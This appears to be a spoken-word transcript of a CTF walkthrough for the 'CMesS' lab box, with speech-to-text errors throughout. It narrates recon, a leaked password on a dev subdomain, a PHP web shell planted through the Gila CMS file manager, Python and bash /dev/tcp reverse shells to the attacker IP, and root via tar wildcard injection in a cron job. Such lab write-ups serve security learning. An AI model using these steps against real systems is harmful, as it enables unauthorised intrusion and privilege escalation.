Hey, what's up everybody, here's Matt. Once again, today we're going to be rooting CMS or CMesS because it's all a mess. I think this is a pretty fun box. And we only have to submit 2 flags for the user and the root user. I mean the user.txt and the root flag. That's it. So let me add 1 hour in here, and it says please add the IP, and let's link it to a subdomain or a domain to find subdomains, right? So nano etc post. This is the file. Let me just replace this one that was from another machine. So cms.thm, that will effectively let us, okay, yeah, let me use sudo here, forget about that part. There you go. And we can now cms.thm, and I can tell Google Chrome to redirect me directly to the website instead of Google. And well, I've just ran my nmap scan here. I've defined a variable t as in target for the 1010 135 to 28, and I've performed a nmap with the -pn to tell nmap that the host is already up and running. That will avoid doing any ping scans to check if it's app. TAC-SV will perform a surface version detection scan, and the C appended to it is just a way to short it, because the whole flag is TAC-SC that will effectively run some default scripts and map paths to each of those services found, right? I'm gonna be using minimum rate, that is no less packets than 500. Since we are in a VPN and in a controlled environment, that will help a long way. That will go a long way. TAC-N, that will disable DNS resolution, that will speed it up. TAC-P will scan the whole range of ports, which are from 1 to 65,535. Here I invoke the variable ton to save it to nmap general. Here are our results. So we have OpenSSH 7.2p2 and port 80 for a patch HTTPD 2.4.18. This is one default script. One of the default scripts, which is http robots.txt, it found it, so it tells us the content and we don't need to visit it ourselves. So it's disallowing source, themes, and live. That isn't necessarily something like crucial, important, confidential. Maybe it's just because there are I don't know, like folders regular users shouldn't be seeing, right? However, this source could could be important, because source code, maybe we have some hints in there. We should definitely check that out. And what else? We have an HTTP title, doesn't have a title. HTTP generator, CMS. That is interesting. I mean, the machine itself says that. Well, it says forbidden, this source. It actually redirected us to a parameter and called source. I don't know. So anyway, so we have Jilla CMS. Let's start fuzzing right away. So I'm going to be using FFUF to perform the fuzzing attack. I'm going to be using colored output, the HTTP, well, the tag used for the URL, right? So I'm going to be invoking my variable t and fuzz. That's the keyword to tell FFUF where we want the words at. Download to user, share their buster, that would be our word list, and 200 threads. In a real environment that would be insane, but here it'll work. So that is interesting. We have an API, author, blog, category, admin, about. If we check Wapalizer, which you can install in the Firefox add-ons like store or something like that, obviously it's free. We don't say anything about Jilla CMS. Let me research that. CMS Jilla. Well, actually, Jilla CMS. And well, it's an open source content management system. I mean, it's not custom. I thought it was custom. It is not. We have an about hello world. We have an about a lot of things. Well, we see we have a lot of results here. We have an admin, for example. The API endpoint looks important. Well, we'll have this, right? So this is for a reconnaissance phase just yet. And to end the reconnaissance phase on this website, obviously I should have finished scanning or falsing the whole word list. But another thing we can do is, for example, use with GoBuster. I like to do it this way, like FFUF to perform like directory falsing, like regular, because it doesn't hang like GoBuster or WFast that they just hang or doesn't report some entries. And GoBuster, I like to use it just for vhosting, right? So what is a vhost? Basically, when you say, for example, okay, I have a CMS.thm, but I also have a, I don't know, a internal.cms or admin.cms, whatever, right? So vhost, and we have, well, let me check the GoBuster here. The vhost, okay, help. And what I'll be doing is u for URL HTTP variable t, right? GoBuster doesn't handle any keywords, so we don't need to specify go or buster or fuzz, anything like that. So yeah, let's say like that. 200 threads, world list, user share, sec list. I think it is discovery, DNS, and subdomains to 20,000. That should work for us. And well, we have a lot. I like to filter out in here. I don't know if, yeah, I should be able to do so. Let me check. Yeah, I don't know, to be honest. I mean, I'm pretty sure there must be a way, right, to like to filter out those. Anyway, let me try with FFUF. I recommend you research on how to do it with GoBuster. Even with WFOSS, it's always important to like to know how to perform a same action with different tools. I'm gonna be doing it like this, but just T, right? I'm gonna be using user share. Actually, yeah. So let me use this trick. Because when you specify a exclamation mark and a $sign, and for example in Kali, that will not work in parrot thing, it will not replace itself, but it will do the same function anyway, is that if you, well, in Kali again, if you give it a space, it will replace the very last argument provided, which was this one, right? So that's why I can see it. So, in here I'm going to be using H for headers. I'm going to be using host and then fuzz, then CMS.thm. That should work, and like that. So look at that. So I see there are several like repeated, like for example 38080, 38080, 380. Let me, for example, use shop. Shop like this. Let me use it in here. If it doesn't work, I'll filter that out. And it look, well, actually I need to, let me check. Sudo nano etc hosts. So I need to do this shop.cms.thm just to see if it works. Let me reload it, but with the S, without the S. And nope, server not found. I mean, CMesS. Yes, take me there. And well, it redirects me to the CMS.thm, so I will filter that out. Right, so F size, filter size 38080. What else? We have 38083. I see two of them, like mail to an admin. Let me try that now. Admin. Well, actually, I need to add it here, right? So CMS.thm, reload without the S. And again, redirect us. So let me filter that out as well. 38083. What else? 38074. I mean, I'm pretty sure they're like the same. So let me just filter them out as well. Wow, filter size. Well, there are a lot of files. I don't know. I mean, directories. One reason could be, let me try admin. Yeah, I see the reason why. For example, if you buzz with admin, then it has 5 letters, that is 5 bytes. But if you try with, for example, admin as does, that will be reflected here as well, right? Like it will be redirecting us. Okay, no, I mean, assuming it's valid, right? Like side defender. Side defender. It will be redirecting us, but it will be showing side defender as well, which has a different, oh gosh. Oh, here. The hell? Let me try it. Side defender. Yeah, I don't know. Oh, well. Again, you need to add it to the etc host. But the thing is that you will be seeing the name reflected on it. So the size will actually vary based on how long is the word you're fuzzing, right? That's why NS5, BIP, and NS7, which have 3 letters, all of them have the same size, 3877, right? However, note that when we found before a def, like here, it was the very first one, and different from SSL, for example, which indeed has 3877, it has another size, 934, so maybe that is different, right? Def. HTTP. Again, let me add it in here, so def. Control S to save. Let us strip the S. And development, we got something. So Andre at CMesS.thm, have you guys fixed the bug that was found in live? Hey Andre, we have managed to fix the misconfigured .ht access file. We're hoping to patch it in the upcoming patch. Support says update. We have had to delay the patch due to unforeseen circumstances. And Andrew says, that's okay. Can you guys reset my password if you get a moment? I seem to be unable to get onto the admin panel. And support replies back, your password has been reset. Here. We have a password. Information leakage. Interesting. This should, I mean, assuming this is a chat, some kind of chat, this should definitely be, I mean, there definitely be a authorization page here to prevent unauthorized actors to access this, right? So we have Andre at CMS.thm and our password, right? So let us log in. Maybe that's not one. Let me copy it in here and copy it directly from here. Email. That should work. Okay, maybe I had a typo in there. So we are in the dashboard, and look at that, we have GLS CMS version 1.10.9. You know what comes into my mind every time I see a word version in any website? That's right, ExploitDB. Anytime I see that, like, I need to look it up there. So search exploit GLA first of all. And look at that. So we have 1.10.9, and Well, 110.9. Apparently just the local file inclusion, maybe. Wait, let me go like that. Yeah. So apparently just the local file inclusion should work in here. The other ones should be patched by now. So let me check that. So search Bloid X for examine. Here it says log in into the application as an admin user or equivalent user and go to CMesS. So this is admin. So probably from here. Like that. And okay. So I'm seeing some files, config.php. I don't know what I'm doing. I'm just testing around. And well, I have a root password, root user password. Let me like creds root. And obviously you never know, right? So let ssh root like t, yes, and ssh pass. You never know. Let me using here .p and then root at t. Here is ssh, so like that. And I don't think so. Nope. Okay. So well, anyway, we have some credentials in here. Source, sites, log, index, config, composer. Well, look at this. I mean, I mean, the jealous CMS is allowing us to catch like files by absolute paths or relative paths actually. So let me go back a couple of directories, see if I can do something here like etc pass.lud is green Linux. And nope, I don't see anything working here. Fm equals f equals, okay, I mean that's source. Not seeing anything. I mean, I don't know if it's the fact that I can actually upload files in here or admin fm. I mean, I don't know, bro. Like, let me grab this one in here. Yeah, etc pass.lud. Yeah, I'm not seeing anything here. So let me go in here and look for something like, I need to create a file. Let us create a backdoor.php. Successfully created. Here I can echo, well, php echo system get cmd, just like that, save. Okay, so backdoor.php cmd equals id. I mean, I don't see it anywhere, right? So is it in source? No. Save. I can find it. Like, oh, I mean, yes, it is there. Yeah, I'm not finding it. Maybe this let me go to student folder, assets, I don't know. Let me create a file again. Backdoor.php. Maybe that directory is protected in some way. So the echo just like that, save, and now assets. And well, look at that. Yes, I mean it looks like the root folder of the website was kind of protected. So now we have remote command execution. I like to grab my reverse shell as soon as possible. So I'm gonna be starting out my listener. I'm gonna be grabbing. Actually, let me check if we have Python. Python 3. Python 3, that'll work. Oh, Python. Let me copy this one and from here, let me 10.6.18.20. I mean 12 to 12 or 4. Let me here instead of Python, just Python 3. Everything's ready. Not working. Yep, there you go. So now we have a shell. And let me stabilize it with script def null bash cty raw minus echo semicolon fg reset x term and export term equals term so that I can control C out of any program or process and control L to clean my screen, right? So let us go back. Let me check if I do have a MySQL running. There you go. So I can remember I have creds. So cat creds. Let me use something like MySQL. You root e like this. There you go. Show databases. Sorry. It's kind of slow. Use Jilla. Show tables. Select everything from user. We have Andre and a pass. Okay, that's all we got. User meta, post, page options. Yeah, that's all we got. Okay, let me enumerate the users in the system. I'm using like this. Remember, I'm using regex, regular expressions, and the dollar signs only mean whatever string that ends with sh. And in this case, it ends with sh, it ends with sh, root, and Andre. So I don't know. Let me try to enumerate some SUIDs in here. I always like to, I don't see anything, so get cap -0, that will be looking for system capabilities. Get cap, yeah, I had a typo. So not a dangerous cap. Let me add front tab. Well, look at that. We do have something interesting here. Every 2 minutes, root is running a task. Okay, so it's cdn into Andres backup folder, and it's tar tag zcf, which is creating a a tar.js file on temp or whatever it is there. This gives us some room to try to exploit this. So basically, there's a super famous kind of exploit or privilege escalation technique that we can use, which is we can look it up like this: privilege escalation tar. I mean wildcard injection. I like to use hack tricks, hacking articles.in also has a really good blog about this, and we can do this. So we can create a shell.sh. Okay, let's wait a minute. Kind of slow, man. Let me go to temp. No, let me go. I mean, we have a problem here because we need to be able to enter this to this directory. Yeah, we can, so that we can create some files, and when this executes, that will read our files as, look at this, as options, command line arguments. So we need to find a way to actually escalate to like escalate laterally or move laterally to Andres account. So yeah, let me reuse this password for a minute. Andre. Nope, that is not. Let me find no, type F user Andre. I want to check what files are from Andre. No. Okay, no file. Type F that, let me see. Type F that I can execute, like perm. For example, user equals execute. A lot of them, obviously. Live var live HTML var HTML. Let me grep that out. And to let me scty rows 45 columns 189. That will be resizing the screen. Let me remove leap. I see something interesting here. opt, so file, ask text, and well, look at that, Andres backup password. Again, information leakage. So Andre. Well, there you go. So let's cd back to our home folder. LA add user.txt. There we have a flag. Let's go enter it right away. User.txt, submit. Cool. So now we have access to backup clearly, and this node will be backed up. Now we need to note self, and this thing here will be backed up. Yes. Yeah, I know. That was a hint, however, you wouldn't have noticed the cron tab file. Oh yeah. So let us create a shell, like nano. It could be whatever, actually. Whatever sh. So let me bin and bash. And from here, let me bin and bash c bash interactive mode ftcp 110.6.18.212 over port 5555. I just fired up my netcat listener on 5555, so 081 like this, and there you go. So this one will be backed up, but just what happened there? Cool. But just like that, it will be backed up and nothing else would happen unless we create some malicious files that tar will interpret as actually there was a command, it was like nope, move that. RM. Let me see how I can create it. So touch like this. Yep. And the other one would be like this. And here will be whatever, literally. Like that. That effectively created a file on this directory that will be that was just a like a workaround, since you guys saw that I wouldn't be able to save a file like this otherwise. But what will be this doing? So it will on tar, it will be setting up a checkpoint on 1. So every 1 file, it will be triggering a checkpoint, right? Now this option says, okay, every time you hit a checkpoint, execute some actions. So the action will be actually to exec something, and the action will be executing with sh, that is with a shell, see whatever that sh file we have in here. Now I don't know if I need to provide whatever with execution no, we didn't. I just saw the connection came back, but we're root, right? I'm not gonna be stabilizing it. I don't see it necessary. Look at that, cat root.txt, and that's it. If you guys didn't understand like that much the privilege escalation technique with wildcard injection, I recommend you take a look at the hacking articles.in blog about this technique. It's super handy. I mean, I think it has super useful information, so definitely look it up. And that's a wrap. That's all for today. I think this one was a super interesting machine, and I really hope you guys enjoyed it as much as I did, because it was nice to root this box, right? So see you later. Thank you very much for joining, and have a good day.